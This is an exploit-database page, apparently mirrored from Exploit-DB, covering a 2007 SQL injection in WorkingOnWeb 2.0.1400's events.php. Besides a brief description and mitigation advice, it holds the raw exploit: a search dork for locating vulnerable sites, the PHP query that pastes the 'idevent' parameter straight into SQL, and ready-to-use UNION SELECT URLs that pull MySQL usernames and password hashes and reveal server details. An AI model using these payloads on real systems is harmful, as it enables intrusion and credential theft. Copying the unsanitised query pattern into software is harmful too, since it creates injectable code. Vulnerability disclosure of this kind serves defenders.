header-logo
Suggest Exploit
vendor:
WorkingOnWeb
by:
ka0x
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: WorkingOnWeb
Affected Version From: WorkingOnWeb 2.0.1400
Affected Version To: WorkingOnWeb 2.0.1400
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WorkingOnWeb 2.0.1400 Remote SQL Injection

The vulnerability allows an attacker to perform a SQL injection attack by manipulating the 'idevent' parameter in the 'events.php' page. By injecting malicious SQL code, the attacker can retrieve sensitive information from the MySQL database, such as usernames and passwords of the 'mysql.user' table. The vulnerability is located in line 4 of the code snippet provided.

Mitigation:

To mitigate this vulnerability, it is recommended to use prepared statements or parameterized queries instead of directly concatenating user input into SQL queries. Additionally, input validation and sanitization should be implemented to prevent malicious input from being executed as SQL code.
Source

Exploit-DB raw data:

WorkingOnWeb 2.0.1400 Remote SQL Injection
d0rk: Powered by WorkingOnWeb 2.0.1400
bug found by ka0x - D.O.M TEAM
contact: ka0x01[!]gmail.com
we: ka0x, an0de, xarnuz, s0cratex, Hendrix
#from spain


1: <?
2: $query = "SELECT cnf_shortname, cnf_name, cnf_begindate, cnf_enddate, cnf_city, cnf_email, cnf_url, cnf_imgpath, cnf_country ".
3:          "FROM conference ".
4:          "WHERE id_conference = $HTTP_GET_VARS[idevent] ".
5:          " AND cnf_private=0";
6: $result = mysql_query($query);
7: $row = mysql_fetch_object($result);
8: ?>
     
vulnerability in line 4.
     
user and password from mysql.user :
http://localhost/events.php?idevent=-1/**/union/**/select/**/concat(user,0x203a3a20,password),null,0,0,0,0,0,0,0/**/from/**/mysql.user/*

Information:
http://localhost/events.php?idevent=-1/**/union/**/select/**/user(),2,3,4,1,1,1,1,1/*
http://localhost/events.php?idevent=-1/**/union/**/select/**/database(),2,3,4,1,1,1,1,1/*
http://localhost/events.php?idevent=-1/**/union/**/select/**/version(),2,3,4,1,1,1,1,1/*

-- 
// ka0x

# milw0rm.com [2007-11-24]

Navigation

Suggest Exploit

Services By CQR